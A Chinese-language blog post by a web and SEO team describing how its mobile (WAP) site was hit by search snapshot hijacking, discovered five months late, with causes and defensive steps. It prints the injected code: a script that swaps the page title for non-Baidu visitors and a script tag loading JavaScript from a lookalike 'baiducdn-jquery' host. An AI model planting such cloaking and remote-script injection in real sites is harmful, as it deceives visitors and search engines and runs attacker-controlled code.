警惕wap手机站被黑！及时备份、检查才是王道

虽然很不想说，但是这次又遇到了一个wap手机站快照劫持的“英勇事迹”！这次网站是我们团队做的，服务器也是自己买的，se包括SEO运营在内都是同一个团队代理。实在找不到理由推脱，请看文件被黑的日期：

有兴趣可以搜一下本站关于快照劫持的讨论历史：快照劫持

6月底的霸都才刚刚进入夏天，现在已经是下过一场大雪的冬季了，被黑（快照劫持）5个月之后才发现并处理，实在是我们自己的失职！不找借口！给我们以后的网站建设以及SEO优化运营敲响了警钟。

代码如下：

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") === -1){document.title ="{zzz:sitetitle}{zzz:sitetitle2}"}</script>

<script src="//cdn.baiducdn-jquery.com:999/jquery/3.3.1/jquery.slim.min.js"></script>

很明显，黑客的js跳转还加上了"baidu"的名头，企图骗过我们的眼睛，当然不会让其如愿！

造成此次情况原因分析：
1、改网站建成时间较早，其余客户服务器有过迁移，但这个网站依然是新网的虚拟主机；

2、老的aspcms二开管理后台，官方一集停止更新好几年了，漏洞较多，更容易被入侵；

3、单独wap站点，由于不在客户的seo任务目标之内，wap站点的后续单独监控也较少；

【小结】应对方案如下：

1、对于老的cms网站，最大限度更改后台以及数据库名等，加上定期的及时检查，保证网站的运行通畅；

2、新的cms站点，定期修改管理cms后台的密码，提高安全性；

3、更换安全性能更好的服务器。

4、有条件的网站，提倡升级https证书访问，多次握手多层保障！